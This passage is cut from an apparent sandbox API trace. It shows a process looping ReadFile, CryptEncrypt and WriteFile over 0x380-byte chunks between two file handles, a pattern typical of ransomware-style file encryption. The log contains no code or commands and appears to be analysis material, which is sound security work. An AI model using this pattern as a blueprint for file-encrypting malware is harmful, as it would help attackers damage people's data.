hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.235] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.235] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.236] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.236] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.237] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.237] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.238] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.238] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.239] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.239] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.239] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.239] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.239] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.239] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.240] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.240] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.241] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.241] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 